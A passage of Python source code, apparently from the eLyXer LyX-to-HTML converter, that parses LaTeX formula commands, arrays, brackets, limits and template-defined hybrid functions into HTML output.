      # label already seen: it lies earlier in the document
      self.direction = u'↑'
      label = Label.names[self.key]
    else:
      # forward reference: create a placeholder label to point at
      self.direction = u'↓'
      label = Label().complete(' ', self.key, 'preref')
    self.destination = label
    self.formatcontents()
    if not self.key in Reference.references:
      Reference.references[self.key] = []
    Reference.references[self.key].append(self)
  def formatcontents(self):
    "Format the reference contents."
    formatkey = self.getparameter('LatexCommand')
    if not formatkey:
      formatkey = 'ref'
    self.formatted = u'↕'
    if formatkey in StyleConfig.referenceformats:
      self.formatted = StyleConfig.referenceformats[formatkey]
    else:
      Trace.error('Unknown reference format ' + formatkey)
    # substitute the placeholders in the format template
    self.replace(u'↕', self.direction)
    self.replace('#', '1')
    self.replace('on-page', Translator.translate('on-page'))
    partkey = self.destination.findpartkey()
    # only if partkey and partkey.number are not null, send partkey.number
    self.replace('@', partkey and partkey.number)
    self.replace(u'¶', partkey and partkey.tocentry)
    if not '$' in self.formatted or not partkey or not partkey.titlecontents:
      # there is a $ left, but it should go away on preprocessing
      self.contents = [Constant(self.formatted)]
      return
    # expand each $ into the title contents of the referenced part
    pieces = self.formatted.split('$')
    self.contents = [Constant(pieces[0])]
    for piece in pieces[1:]:
      self.contents += partkey.titlecontents
      self.contents.append(Constant(piece))
  def replace(self, key, value):
    "Replace a key in the format template with a value."
    if not key in self.formatted:
      return
    if not value:
      value = ''
    self.formatted = self.formatted.replace(key, value)
  def __unicode__(self):
    "Return a printable representation."
    return 'Reference ' + self.key
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class FormulaCommand(FormulaBit):
  "A LaTeX command inside a formula"
  # handler classes consulted in order by parsewithcommand(); filled at module level
  types = []
  start = FormulaConfig.starts['command']
  commandmap = None
  def detect(self, pos):
    "Find the current command."
    return pos.checkfor(FormulaCommand.start)
  def parsebit(self, pos):
    "Parse the command; return the parsed bit, or None for unknown commands."
    command = self.extractcommand(pos)
    bit = self.parsewithcommand(command, pos)
    if bit:
      return bit
    if command.startswith('\\up') or command.startswith('\\Up'):
      upgreek = self.parseupgreek(command, pos)
      if upgreek:
        return upgreek
    if not self.factory.defining:
      # while defining a macro, unknown commands are expected (parameters)
      Trace.error('Unknown command ' + command)
    self.output = TaggedOutput().settag('span class="unknown"')
    self.add(FormulaConstant(command))
    return None
  def parsewithcommand(self, command, pos):
    "Parse the command type once we have the command."
    for type in FormulaCommand.types:
      if command in type.commandmap:
        return self.parsecommandtype(command, type, pos)
    return None
  def parsecommandtype(self, command, type, pos):
    "Parse a given command type."
    bit = self.factory.create(type)
    bit.setcommand(command)
    returned = bit.parsebit(pos)
    if returned:
      return returned
    return bit
  def extractcommand(self, pos):
    "Extract the command from the current position."
    if not pos.checkskip(FormulaCommand.start):
      pos.error('Missing command start ' + FormulaCommand.start)
      return
    if pos.finished():
      return self.emptycommand(pos)
    if pos.current().isalpha():
      # alpha command
      command = FormulaCommand.start + pos.globalpha()
      # skip mark of short command
      pos.checkskip('*')
      return command
    # symbol command
    return FormulaCommand.start + pos.skipcurrent()
  def emptycommand(self, pos):
    """Check for an empty command: look for command disguised as ending.
    Special case against '{ \\{ \\} }' situation."""
    command = ''
    if not pos.isout():
      ending = pos.nextending()
      if ending and pos.checkskip(ending):
        command = ending
    return FormulaCommand.start + command
  def parseupgreek(self, command, pos):
    "Map a Greek \\up.../\\Up... command to the plain Greek command and parse it."
    if len(command) < 4:
      return None
    if command.startswith('\\up'):
      upcommand = '\\' + command[3:]
    elif command.startswith('\\Up'):
      # bugfix: this used to be pos.checkskip('\\Up'), but the command text
      # has already been consumed from pos, so the check never matched here
      # and could even swallow the start of the next command
      upcommand = '\\' + command[3:4].upper() + command[4:]
    else:
      Trace.error('Impossible upgreek command: ' + command)
      return
    upgreek = self.parsewithcommand(upcommand, pos)
    if upgreek:
      upgreek.type = 'font'
    return upgreek
class CommandBit(FormulaCommand):
  "A formula bit that includes a command"
  def setcommand(self, command):
    "Set the command in the bit"
    self.command = command
    if self.commandmap:
      self.original += command
      # translated holds the configured output form for this command
      self.translated = self.commandmap[self.command]
  def parseparameter(self, pos):
    "Parse a parameter at the current position"
    self.factory.clearskipped(pos)
    if pos.finished():
      return None
    parameter = self.factory.parseany(pos)
    self.add(parameter)
    return parameter
  def parsesquare(self, pos):
    "Parse a square bracket"
    self.factory.clearskipped(pos)
    if not self.factory.detecttype(SquareBracket, pos):
      return None
    bracket = self.factory.parsetype(SquareBracket, pos)
    self.add(bracket)
    return bracket
  def parseliteral(self, pos):
    "Parse a literal bracket."
    self.factory.clearskipped(pos)
    if not self.factory.detecttype(Bracket, pos):
      # no bracket present: fall back to a bare value token
      if not pos.isvalue():
        Trace.error('No literal parameter found at: ' + pos.identifier())
        return None
      return pos.globvalue()
    bracket = Bracket().setfactory(self.factory)
    self.add(bracket.parseliteral(pos))
    return bracket.literal
  def parsesquareliteral(self, pos):
    "Parse a square bracket literally."
    self.factory.clearskipped(pos)
    if not self.factory.detecttype(SquareBracket, pos):
      return None
    bracket = SquareBracket().setfactory(self.factory)
    self.add(bracket.parseliteral(pos))
    return bracket.literal
  def parsetext(self, pos):
    "Parse a text parameter."
    self.factory.clearskipped(pos)
    if not self.factory.detecttype(Bracket, pos):
      Trace.error('No text parameter for ' + self.command)
      return None
    bracket = Bracket().setfactory(self.factory).parsetext(pos)
    self.add(bracket)
    return bracket
class EmptyCommand(CommandBit):
  "An empty command (without parameters)"
  commandmap = FormulaConfig.commands
  def parsebit(self, pos):
    "Parse a command without parameters"
    # the whole output is just the configured translation of the command
    self.contents = [FormulaConstant(self.translated)]
class SpacedCommand(CommandBit):
  "An empty command which should have math spacing in formulas."
  commandmap = FormulaConfig.spacedcommands
  def parsebit(self, pos):
    "Place as contents the command translated and spaced."
    # surround the translation with spaces, e.g. for binary operators
    self.contents = [FormulaConstant(u' ' + self.translated + u' ')]
class AlphaCommand(EmptyCommand):
  "A command without parameters whose result is alphabetical"
  commandmap = FormulaConfig.alphacommands
  def parsebit(self, pos):
    "Parse the command and set type to alpha"
    EmptyCommand.parsebit(self, pos)
    # the alpha type influences later spacing/styling decisions
    self.type = 'alpha'
class OneParamFunction(CommandBit):
  "A function of one parameter"
  commandmap = FormulaConfig.onefunctions
  # set to True once the function has been reduced to a single character
  simplified = False
  def parsebit(self, pos):
    "Parse a function with one parameter"
    self.output = TaggedOutput().settag(self.translated)
    self.parseparameter(pos)
    self.simplifyifpossible()
  def simplifyifpossible(self):
    "Try to simplify to a single character."
    # if the original text (command + parameter) is itself mapped,
    # emit the mapped character instead of the tagged output
    if self.original in self.commandmap:
      self.output = FixedOutput()
      self.html = [self.commandmap[self.original]]
      self.simplified = True
class SymbolFunction(CommandBit):
  "Find a function which is represented by a symbol (like _ or ^)"
  commandmap = FormulaConfig.symbolfunctions
  def detect(self, pos):
    "Find the symbol"
    return pos.current() in SymbolFunction.commandmap
  def parsebit(self, pos):
    "Parse the symbol"
    # the symbol character itself is the command; there is no backslash
    self.setcommand(pos.current())
    pos.skip(self.command)
    self.output = TaggedOutput().settag(self.translated)
    self.parseparameter(pos)
class TextFunction(CommandBit):
  "A function where parameters are read as text."
  commandmap = FormulaConfig.textfunctions
  def parsebit(self, pos):
    "Parse a text parameter"
    self.output = TaggedOutput().settag(self.translated)
    self.parsetext(pos)
  def process(self):
    "Set the type to font"
    self.type = 'font'
class LabelFunction(CommandBit):
  "A function that acts as a label"
  commandmap = FormulaConfig.labelfunctions
  def parsebit(self, pos):
    "Parse a literal parameter"
    # the literal is the label key, e.g. \label{eq:first} -> 'eq:first'
    self.key = self.parseliteral(pos)
  def process(self):
    "Add an anchor with the label contents."
    self.type = 'font'
    self.label = Label().create(' ', self.key, type = 'eqnumber')
    self.contents = [self.label]
    # store as a Label so we know it's been seen
    Label.names[self.key] = self.label
class FontFunction(OneParamFunction):
  "A function of one parameter that changes the font"
  commandmap = FormulaConfig.fontfunctions
  def process(self):
    "Simplify if possible using a single character."
    self.type = 'font'
    self.simplifyifpossible()
# register the formula bits that the factory can detect directly
FormulaFactory.types += [FormulaCommand, SymbolFunction]
# command handler classes consulted by FormulaCommand.parsewithcommand()
FormulaCommand.types = [
  AlphaCommand, EmptyCommand, OneParamFunction, FontFunction, LabelFunction,
  TextFunction, SpacedCommand,
]
class BigSymbol(object):
  "Generates the display pieces for a big symbol."
  symbols = FormulaConfig.bigsymbols
  def __init__(self, symbol):
    "Remember the symbol to generate."
    self.symbol = symbol
  def getpieces(self):
    "Return the list of pieces: several stacked pieces, or just the symbol."
    # unknown symbols, and symbols rendered small, stay as a single piece
    if self.symbol not in self.symbols or self.smalllimit():
      return [self.symbol]
    return self.symbols[self.symbol]
  def smalllimit(self):
    "Decide if the limit should be a small, one-line symbol."
    if not DocumentParameters.displaymode:
      return True
    return len(self.symbols[self.symbol]) == 1 or Options.simplemath
class BigBracket(BigSymbol):
  "A big bracket generator."
  def __init__(self, size, bracket, alignment='l'):
    "Set the size and symbol for the bracket."
    self.size = size
    self.original = bracket
    self.alignment = alignment
    self.pieces = None
    if bracket in FormulaConfig.bigbrackets:
      self.pieces = FormulaConfig.bigbrackets[bracket]
  def getpiece(self, index):
    "Return the nth piece for the bracket."
    # dispatch by piece count: getpiece1, getpiece3 or getpiece4
    function = getattr(self, 'getpiece' + unicode(len(self.pieces)))
    return function(index)
  def getpiece1(self, index):
    "Return the only piece for a single-piece bracket."
    return self.pieces[0]
  def getpiece3(self, index):
    "Get the nth piece for a 3-piece bracket: parenthesis or square bracket."
    if index == 0:
      return self.pieces[0]
    if index == self.size - 1:
      return self.pieces[-1]
    return self.pieces[1]
  def getpiece4(self, index):
    "Get the nth piece for a 4-piece bracket: curly bracket."
    if index == 0:
      return self.pieces[0]
    if index == self.size - 1:
      return self.pieces[3]
    # bugfix: use floor division; with Python 3 true division the result is
    # a float that never equals an integer index, so the middle piece of the
    # curly bracket was never emitted
    if index == (self.size - 1) // 2:
      return self.pieces[2]
    return self.pieces[1]
  def getcell(self, index):
    "Get the bracket piece as an array cell."
    piece = self.getpiece(index)
    span = 'span class="bracket align-' + self.alignment + '"'
    return TaggedBit().constant(piece, span)
  def getcontents(self):
    "Get the bracket as an array or as a single bracket."
    if self.size == 1 or not self.pieces:
      return self.getsinglebracket()
    rows = []
    for index in range(self.size):
      cell = self.getcell(index)
      rows.append(TaggedBit().complete([cell], 'span class="arrayrow"'))
    return [TaggedBit().complete(rows, 'span class="array"')]
  def getsinglebracket(self):
    "Return the bracket as a single sign."
    if self.original == '.':
      # '.' is the LaTeX convention for an invisible bracket
      return [TaggedBit().constant('', 'span class="emptydot"')]
    return [TaggedBit().constant(self.original, 'span class="symbol"')]
class FormulaEquation(CommandBit):
  "A simple numbered equation."
  # environment name matched by BeginCommand.findbit()
  piece = 'equation'
  def parsebit(self, pos):
    "Parse the array"
    self.output = ContentsOutput()
    self.add(self.factory.parsetype(WholeFormula, pos))
class FormulaCell(FormulaCommand):
  "An array cell inside a row"
  def setalignment(self, alignment):
    "Set the alignment and the matching output tag; returns self for chaining."
    self.alignment = alignment
    self.output = TaggedOutput().settag('span class="arraycell align-' + alignment +'"', True)
    return self
  def parsebit(self, pos):
    "Parse the cell contents as a whole formula."
    self.factory.clearskipped(pos)
    if pos.finished():
      return
    self.add(self.factory.parsetype(WholeFormula, pos))
class FormulaRow(FormulaCommand):
  "An array row inside an array"
  cellseparator = FormulaConfig.array['cellseparator']
  def setalignments(self, alignments):
    "Set the cell alignments for this row; returns self for chaining."
    self.alignments = alignments
    self.output = TaggedOutput().settag('span class="arrayrow"', True)
    return self
  def parsebit(self, pos):
    "Parse a whole row"
    index = 0
    # the separator ending is optional so the last cell needs no trailing one
    pos.pushending(self.cellseparator, optional=True)
    while not pos.finished():
      cell = self.createcell(index)
      cell.parsebit(pos)
      self.add(cell)
      index += 1
      pos.checkskip(self.cellseparator)
    if len(self.contents) == 0:
      # an empty row produces no output at all
      self.output = EmptyOutput()
  def createcell(self, index):
    "Create the cell that corresponds to the given index."
    # alignments repeat cyclically if there are more cells than alignments
    alignment = self.alignments[index % len(self.alignments)]
    return self.factory.create(FormulaCell).setalignment(alignment)
class MultiRowFormula(CommandBit):
  "A formula with multiple rows."
  def parserows(self, pos):
    "Parse all rows, finish when no more row ends"
    self.rows = []
    first = True
    for row in self.iteraterows(pos):
      if first:
        first = False
      else:
        # intersparse empty rows
        self.addempty()
      row.parsebit(pos)
      self.addrow(row)
    self.size = len(self.rows)
  def iteraterows(self, pos):
    "Iterate over all rows, end when no more row ends"
    rowseparator = FormulaConfig.array['rowseparator']
    while True:
      pos.pushending(rowseparator, True)
      row = self.factory.create(FormulaRow)
      yield row.setalignments(self.alignments)
      # the caller has parsed the row by now; consume the separator if present
      if pos.checkfor(rowseparator):
        self.original += pos.popending(rowseparator)
      else:
        return
  def addempty(self):
    "Add an empty row."
    row = self.factory.create(FormulaRow).setalignments(self.alignments)
    # mirror the cell count of the previous row using blank cells
    for index, originalcell in enumerate(self.rows[-1].contents):
      cell = row.createcell(index)
      cell.add(FormulaConstant(u' '))
      row.add(cell)
    self.addrow(row)
  def addrow(self, row):
    "Add a row to the contents and to the list of rows."
    self.rows.append(row)
    self.add(row)
class FormulaArray(MultiRowFormula):
  "An array within a formula"
  # environment name matched by BeginCommand.findbit()
  piece = 'array'
  def parsebit(self, pos):
    "Parse the array: alignments first, then all the rows."
    self.output = TaggedOutput().settag('span class="array"', False)
    self.parsealignments(pos)
    self.parserows(pos)
  def parsealignments(self, pos):
    "Parse the vertical and horizontal alignments."
    # vertical alignment: optional square bracket, defaults to centered
    self.valign = 'c'
    literal = self.parsesquareliteral(pos)
    if literal:
      self.valign = literal
    # horizontal alignments: one character per column, e.g. 'lcr';
    # list() splits the literal into characters (was a manual append loop)
    self.alignments = list(self.parseliteral(pos))
class FormulaMatrix(MultiRowFormula):
  "A matrix (array with center alignment)."
  # environment name matched by BeginCommand.findbit()
  piece = 'matrix'
  def parsebit(self, pos):
    "Parse the matrix, set alignments to 'c'."
    self.output = TaggedOutput().settag('span class="array"', False)
    self.valign = 'c'
    self.alignments = ['c']
    self.parserows(pos)
class FormulaCases(MultiRowFormula):
  "A cases statement"
  # environment name matched by BeginCommand.findbit()
  piece = 'cases'
  def parsebit(self, pos):
    "Parse the cases"
    self.output = ContentsOutput()
    self.alignments = ['l', 'l']
    self.parserows(pos)
    # retag every cell and pad it with a space
    for row in self.contents:
      for cell in row.contents:
        cell.output.settag('span class="case align-l"', True)
        cell.contents.append(FormulaConstant(u' '))
    # a big left brace spanning all rows, followed by the array of cases
    array = TaggedBit().complete(self.contents, 'span class="bracketcases"', True)
    brace = BigBracket(len(self.contents), '{', 'l')
    self.contents = brace.getcontents() + [array]
class EquationEnvironment(MultiRowFormula):
  "A \\begin{}...\\end equation environment with rows and cells."
  def parsebit(self, pos):
    "Parse the whole environment."
    self.output = TaggedOutput().settag('span class="environment"', False)
    # the starred variant shares the configuration of the plain environment
    environment = self.piece.replace('*', '')
    if environment in FormulaConfig.environments:
      self.alignments = FormulaConfig.environments[environment]
    else:
      Trace.error('Unknown equation environment ' + self.piece)
      self.alignments = ['l']
    self.parserows(pos)
class BeginCommand(CommandBit):
  "A \\begin{}...\\end command and what it entails (array, cases, aligned)"
  commandmap = {FormulaConfig.array['begin']:''}
  # specialized environments; anything else becomes an EquationEnvironment
  types = [FormulaEquation, FormulaArray, FormulaCases, FormulaMatrix]
  def parsebit(self, pos):
    "Parse the begin command"
    command = self.parseliteral(pos)
    bit = self.findbit(command)
    # parse everything up to the matching \end{command}
    ending = FormulaConfig.array['end'] + '{' + command + '}'
    pos.pushending(ending)
    bit.parsebit(pos)
    self.add(bit)
    self.original += pos.popending(ending)
    self.size = bit.size
  def findbit(self, piece):
    "Find the command bit corresponding to the \\begin{piece}"
    # starred variants ('align*') map to the same handler as unstarred ones
    for type in BeginCommand.types:
      if piece.replace('*', '') == type.piece:
        return self.factory.create(type)
    bit = self.factory.create(EquationEnvironment)
    bit.piece = piece
    return bit
# make \begin{...} available inside formulas
FormulaCommand.types += [BeginCommand]
class CombiningFunction(OneParamFunction):
  "A function that applies a combining character to a one-character parameter."
  commandmap = FormulaConfig.combiningfunctions
  def parsebit(self, pos):
    "Parse a combining function."
    self.type = 'alpha'
    combining = self.translated
    parameter = self.parsesingleparameter(pos)
    if not parameter:
      Trace.error('Empty parameter for combining function ' + self.command)
    elif len(parameter.extracttext()) != 1:
      Trace.error('Applying combining function ' + self.command + ' to invalid string "' + parameter.extracttext() + '"')
    # the combining character goes after the character it modifies
    self.contents.append(Constant(combining))
  def parsesingleparameter(self, pos):
    "Parse a parameter, or a single letter."
    self.factory.clearskipped(pos)
    if pos.finished():
      Trace.error('Error while parsing single parameter at ' + pos.identifier())
      return None
    if self.factory.detecttype(Bracket, pos) \
        or self.factory.detecttype(FormulaCommand, pos):
      return self.parseparameter(pos)
    # bare character: wrap it as a constant and use it as the parameter
    letter = FormulaConstant(pos.skipcurrent())
    self.add(letter)
    return letter
class DecoratingFunction(OneParamFunction):
  "A function that decorates some bit of text"
  commandmap = FormulaConfig.decoratingfunctions
  def parsebit(self, pos):
    "Parse a decorating function"
    self.type = 'alpha'
    symbol = self.translated
    self.symbol = TaggedBit().constant(symbol, 'span class="symbolover"')
    self.parameter = self.parseparameter(pos)
    self.output = TaggedOutput().settag('span class="withsymbol"')
    # the decoration is placed above the decorated parameter
    self.contents.insert(0, self.symbol)
    self.parameter.output = TaggedOutput().settag('span class="undersymbol"')
    self.simplifyifpossible()
class LimitCommand(EmptyCommand):
  "A command which accepts limits above and below, in display mode."
  commandmap = FormulaConfig.limitcommands
  def parsebit(self, pos):
    "Parse a limit command."
    # a big symbol may consist of several stacked pieces in display mode
    pieces = BigSymbol(self.translated).getpieces()
    self.output = TaggedOutput().settag('span class="limits"')
    for piece in pieces:
      self.contents.append(TaggedBit().constant(piece, 'span class="limit"'))
class LimitPreviousCommand(LimitCommand):
  "A command to limit the previous command."
  # not parsed from a command map; detected by LimitsProcessor instead
  commandmap = None
  def parsebit(self, pos):
    "Do nothing."
    self.output = TaggedOutput().settag('span class="limits"')
    self.factory.clearskipped(pos)
  def __unicode__(self):
    "Return a printable representation."
    return 'Limit previous command'
  if sys.version_info >= (3, 0):
    # Python 3 has no __unicode__ protocol; reuse the method as __str__
    __str__ = __unicode__
class LimitsProcessor(MathsProcessor):
  "A processor for limits inside an element."
  def process(self, contents, index):
    "Process the limits for an element."
    if Options.simplemath:
      return
    if self.checklimits(contents, index):
      self.modifylimits(contents, index)
    if self.checkscript(contents, index) and self.checkscript(contents, index + 1):
      # two consecutive scripts (sub + super): stack them vertically
      self.modifyscripts(contents, index)
  def checklimits(self, contents, index):
    "Check if the current position has a limits command."
    if not DocumentParameters.displaymode:
      return False
    if self.checkcommand(contents, index + 1, LimitPreviousCommand):
      self.limitsahead(contents, index)
      return False
    if not isinstance(contents[index], LimitCommand):
      return False
    return self.checkscript(contents, index + 1)
  def limitsahead(self, contents, index):
    "Limit the current element based on the next."
    contents[index + 1].add(contents[index].clone())
    # silence the original element; its clone now lives inside the next one
    contents[index].output = EmptyOutput()
  def modifylimits(self, contents, index):
    "Modify a limits commands so that the limits appear above and below."
    limited = contents[index]
    subscript = self.getlimit(contents, index + 1)
    limited.contents.append(subscript)
    # getlimit() removed the subscript, so a superscript is at index + 1 now
    if self.checkscript(contents, index + 1):
      superscript = self.getlimit(contents, index + 1)
    else:
      # no superscript: insert a blank one to keep the layout symmetric
      superscript = TaggedBit().constant(u' ', 'sup class="limit"')
    limited.contents.insert(0, superscript)
  def getlimit(self, contents, index):
    "Get the limit for a limits command."
    limit = self.getscript(contents, index)
    limit.output.tag = limit.output.tag.replace('script', 'limit')
    return limit
  def modifyscripts(self, contents, index):
    "Modify the super- and subscript to appear vertically aligned."
    subscript = self.getscript(contents, index)
    # subscript removed so instead of index + 1 we get index again
    superscript = self.getscript(contents, index)
    scripts = TaggedBit().complete([superscript, subscript], 'span class="scripts"')
    contents.insert(index, scripts)
  def checkscript(self, contents, index):
    "Check if the current element is a sub- or superscript."
    return self.checkcommand(contents, index, SymbolFunction)
  def checkcommand(self, contents, index, type):
    "Check for the given type as the current element."
    if len(contents) <= index:
      return False
    return isinstance(contents[index], type)
  def getscript(self, contents, index):
    "Get the sub- or superscript, removing it from the contents."
    bit = contents[index]
    bit.output.tag += ' class="script"'
    del contents[index]
    return bit
class BracketCommand(OneParamFunction):
  "A command which defines a bracket."
  commandmap = FormulaConfig.bracketcommands
  def parsebit(self, pos):
    "Parse the bracket as a plain one-parameter function."
    OneParamFunction.parsebit(self, pos)
  def create(self, direction, character):
    "Build a ready-made bracket from a direction and a character; returns self."
    self.command = '\\' + direction
    self.original = character
    self.contents = [FormulaConstant(character)]
    return self
class BracketProcessor(MathsProcessor):
  "A processor for bracket commands."
  def process(self, contents, index):
    "Convert the bracket using Unicode pieces, if possible."
    if Options.simplemath:
      return
    if self.checkleft(contents, index):
      return self.processleft(contents, index)
  def processleft(self, contents, index):
    "Process a left bracket: resize it and its matching right bracket."
    rightindex = self.findright(contents, index + 1)
    if not rightindex:
      return
    size = self.findmax(contents, index, rightindex)
    self.resize(contents[index], size)
    self.resize(contents[rightindex], size)
  def checkleft(self, contents, index):
    "Check if the command at the given index is left."
    return self.checkdirection(contents[index], '\\left')
  def checkright(self, contents, index):
    "Check if the command at the given index is right."
    return self.checkdirection(contents[index], '\\right')
  def checkdirection(self, bit, command):
    "Check if the given bit is the desired bracket command."
    if not isinstance(bit, BracketCommand):
      return False
    return bit.command == command
  def findright(self, contents, index):
    "Find the matching right bracket starting at the given index, or None."
    # track nesting: every \left increases depth, every \right decreases it
    depth = 1
    while index < len(contents):
      if self.checkleft(contents, index):
        depth += 1
      if self.checkright(contents, index):
        depth -= 1
        if depth == 0:
          return index
      index += 1
    return None
  def findmax(self, contents, leftindex, rightindex):
    "Find the max size of the contents between the two given indices."
    # generator expression avoids materializing an intermediate list
    return max(element.size for element in contents[leftindex:rightindex])
  def resize(self, command, size):
    "Resize a bracket command to the given size."
    character = command.extracttext()
    alignment = command.command.replace('\\', '')
    bracket = BigBracket(size, character, alignment)
    command.output = ContentsOutput()
    command.contents = bracket.getcontents()
class TodayCommand(EmptyCommand):
  "Shows today's date."
  # not parsed from a LaTeX command map; inserted programmatically
  commandmap = None
  def parsebit(self, pos):
    "Parse a command without parameters"
    self.output = FixedOutput()
    self.html = [datetime.date.today().strftime('%b %d, %Y')]
# register the remaining command handlers and the maths post-processors
FormulaCommand.types += [
  DecoratingFunction, CombiningFunction, LimitCommand, BracketCommand,
]
FormulaProcessor.processors += [
  LimitsProcessor(), BracketProcessor(),
]
class ParameterDefinition(object):
  "The definition of a parameter in a hybrid function."
  "[] parameters are optional, {} parameters are mandatory."
  "Each parameter has a one-character name, like {$1} or {$p}."
  "A parameter that ends in ! like {$p!} is a literal."
  "Example: [$1]{$p!} reads an optional parameter $1 and a literal mandatory parameter p."
  parambrackets = [('[', ']'), ('{', '}')]
  def __init__(self):
    # one-character parameter name, e.g. '1' or 'p'
    self.name = None
    # literal parameters are read as raw text, not parsed as formulas
    self.literal = False
    self.optional = False
    # the parsed value (a formula bit) once read
    self.value = None
    self.literalvalue = None
  def parse(self, pos):
    "Parse a parameter definition: [$0], {$x}, {$1!}..."
    for (opening, closing) in ParameterDefinition.parambrackets:
      if pos.checkskip(opening):
        if opening == '[':
          self.optional = True
        if not pos.checkskip('$'):
          Trace.error('Wrong parameter name, did you mean $' + pos.current() + '?')
          return None
        self.name = pos.skipcurrent()
        if pos.checkskip('!'):
          self.literal = True
        if not pos.checkskip(closing):
          Trace.error('Wrong parameter closing ' + pos.skipcurrent())
          return None
        return self
    Trace.error('Wrong character in parameter template: ' + pos.skipcurrent())
    return None
  def read(self, pos, function):
    "Read the parameter itself using the definition."
    if self.literal:
      if self.optional:
        self.literalvalue = function.parsesquareliteral(pos)
      else:
        self.literalvalue = function.parseliteral(pos)
      if self.literalvalue:
        # wrap the raw text so it can be used like any other value
        self.value = FormulaConstant(self.literalvalue)
    elif self.optional:
      self.value = function.parsesquare(pos)
    else:
      self.value = function.parseparameter(pos)
  def __unicode__(self):
    "Return a printable representation."
    result = 'param ' + self.name
    if self.value:
      result += ': ' + unicode(self.value)
    else:
      result += ' (empty)'
    return result
  if sys.version_info >= (3, 0):
    # Python 3 has no __unicode__ protocol; reuse the method as __str__
    __str__ = __unicode__
class ParameterFunction(CommandBit):
  "A function with a variable number of parameters defined in a template."
  "The parameters are defined as a parameter definition."
  def readparams(self, readtemplate, pos):
    "Read the params according to the template."
    # params maps '$' + name -> ParameterDefinition (already read)
    self.params = dict()
    for paramdef in self.paramdefs(readtemplate):
      paramdef.read(pos, self)
      self.params['$' + paramdef.name] = paramdef
  def paramdefs(self, readtemplate):
    "Read each param definition in the template"
    pos = TextPosition(readtemplate)
    while not pos.finished():
      paramdef = ParameterDefinition().parse(pos)
      if paramdef:
        yield paramdef
  def getparam(self, name):
    "Get a parameter as parsed."
    if not name in self.params:
      return None
    return self.params[name]
  def getvalue(self, name):
    "Get the value of a parameter."
    # NOTE(review): raises AttributeError for an unknown name, unlike
    # getliteralvalue() which returns None — confirm callers only pass
    # names present in the read template
    return self.getparam(name).value
  def getliteralvalue(self, name):
    "Get the literal value of a parameter."
    param = self.getparam(name)
    if not param or not param.literalvalue:
      return None
    return param.literalvalue
class HybridFunction(ParameterFunction):
  """
  A parameter function where the output is also defined using a template.
  The template can use a number of functions; each function has an associated
  tag.
  Example: [f0{$1},span class="fbox"] defines a function f0 which corresponds
  to a span of class fbox, yielding <span class="fbox">$1</span>.
  Literal parameters can be used in tags definitions:
    [f0{$1},span style="color: $p;"]
  yields <span style="color: $p;">$1</span>, where $p is a literal parameter.
  Sizes can be specified in hybridsizes, e.g. adding parameter sizes. By
  default the resulting size is the max of all arguments. Sizes are used
  to generate the right parameters.
  A function followed by a single / is output as a self-closing XHTML tag:
    [f0/,hr]
  will generate <hr/>.
  """
  commandmap = FormulaConfig.hybridfunctions
  def parsebit(self, pos):
    "Parse a function with [] and {} parameters"
    # translated is a list: [read template, write template, tag0, tag1, ...]
    readtemplate = self.translated[0]
    writetemplate = self.translated[1]
    self.readparams(readtemplate, pos)
    self.contents = self.writeparams(writetemplate)
    self.computehybridsize()
  def writeparams(self, writetemplate):
    "Write all params according to the template"
    return self.writepos(TextPosition(writetemplate))
  def writepos(self, pos):
    "Write all params as read in the parse position."
    result = []
    while not pos.finished():
      if pos.checkskip('$'):
        param = self.writeparam(pos)
        if param:
          result.append(param)
      elif pos.checkskip('f'):
        function = self.writefunction(pos)
        if function:
          function.type = None
          result.append(function)
      elif pos.checkskip('('):
        result.append(self.writebracket('left', '('))
      elif pos.checkskip(')'):
        result.append(self.writebracket('right', ')'))
      else:
        # any other character is copied through verbatim
        result.append(FormulaConstant(pos.skipcurrent()))
    return result
  def writeparam(self, pos):
    "Write a single param of the form $0, $x..."
    name = '$' + pos.skipcurrent()
    if not name in self.params:
      Trace.error('Unknown parameter ' + name)
      return None
    if not self.params[name]:
      return None
    if pos.checkskip('.'):
      # '$1.type' syntax forces the type of the parameter value
      self.params[name].value.type = pos.globalpha()
    return self.params[name].value
  def writefunction(self, pos):
    "Write a single function f0,...,fn."
    tag = self.readtag(pos)
    if not tag:
      return None
    if pos.checkskip('/'):
      # self-closing XHTML tag, such as <hr/>
      return TaggedBit().selfcomplete(tag)
    if not pos.checkskip('{'):
      Trace.error('Function should be defined in {}')
      return None
    pos.pushending('}')
    contents = self.writepos(pos)
    pos.popending()
    if len(contents) == 0:
      return None
    return TaggedBit().complete(contents, tag)
  def readtag(self, pos):
    "Get the tag corresponding to the given index. Does parameter substitution."
    if not pos.current().isdigit():
      Trace.error('Function should be f0,...,f9: f' + pos.current())
      return None
    index = int(pos.skipcurrent())
    # bugfix: was '>', which let 2 + index == len(self.translated) through
    # and raised IndexError below instead of reporting the missing function
    if 2 + index >= len(self.translated):
      Trace.error('Function f' + unicode(index) + ' is not defined')
      return None
    tag = self.translated[2 + index]
    if not '$' in tag:
      return tag
    # substitute literal parameters inside the tag definition
    for variable in self.params:
      if variable in tag:
        param = self.params[variable]
        if not param.literal:
          Trace.error('Parameters in tag ' + tag + ' should be literal: {' + variable + '!}')
          continue
        if param.literalvalue:
          value = param.literalvalue
        else:
          value = ''
        tag = tag.replace(variable, value)
    return tag
  def writebracket(self, direction, character):
    "Return a new bracket looking at the given direction."
    return self.factory.create(BracketCommand).create(direction, character)
  def computehybridsize(self):
    "Compute the size of the hybrid function."
    if not self.command in HybridSize.configsizes:
      self.computesize()
      return
    self.size = HybridSize().getsize(self)
    # set the size in all elements at first level
    for element in self.contents:
      element.size = self.size
class HybridSize(object):
  "The size associated with a hybrid function."
  configsizes = FormulaConfig.hybridsizes
  def getsize(self, function):
    "Read the size for a function and parse it."
    sizestring = self.configsizes[function.command]
    # substitute each parameter name with the computed size of its value
    for name in function.params:
      if name in sizestring:
        size = function.params[name].value.computesize()
        sizestring = sizestring.replace(name, unicode(size))
    if '$' in sizestring:
      Trace.error('Unconverted variable in hybrid size: ' + sizestring)
      return 1
    # NOTE(review): eval() on a config-supplied arithmetic expression; only
    # safe while hybridsizes comes from trusted built-in configuration
    return eval(sizestring)
# register hybrid functions as formula command handlers
FormulaCommand.types += [HybridFunction]
class HeaderParser(Parser):
  "Parses the LyX header"
  def parse(self, reader):
    "Parse header parameters into a dictionary, return the preamble."
    contents = []
    self.parseending(reader, lambda: self.parseline(reader, contents))
    # skip last line
    reader.nextline()
    return contents
  def parseline(self, reader, contents):
    "Parse a single line as a parameter or as a start"
    line = reader.currentline()
    if line.startswith(HeaderConfig.parameters['branch']):
      self.parsebranch(reader)
      return
